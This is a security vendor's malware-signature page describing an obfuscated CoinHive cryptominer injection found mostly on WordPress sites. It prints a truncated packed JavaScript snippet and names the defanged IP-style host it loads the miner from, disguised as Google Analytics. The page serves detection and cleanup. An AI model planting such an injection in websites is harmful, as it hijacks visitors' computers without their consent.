Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: malware.cryptominer.6

Description: Website contains an encrypted CoinHive JavaScript miner library, which usually means that it's used without webmaster's consent.

eval​(function(p,​a,c,k,e,r){e=function(c)...skipped...document|​google_analytics​|function|var|type|text|javascript|5000|addScript|getElementsByTagName|body|appendChild|setTimeout|createElement|stats|11|​3104709642|lib|jquery|onload|src|innerHTML|min|new|googleanalytics​|Anonymous||​NPRak9QU4lFBSneFt23qEIChh5r0SZev​|start|http|window|js'.split('|'),0,{}))

This code injects a script from hxxp:// 3104709642/lib/jquery-3.2.1.min.js?v=3.2.11 that loads the CoinHive JavaScript miner under disguise of Google Analytics.

More information: Microsoft Malware Protection Center notice.
This infection usually comes along with the cloudflare.solutions malware.


Affecting: Mostly WordPress sites

Mitigation How to clean a hacked WordPress site


For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb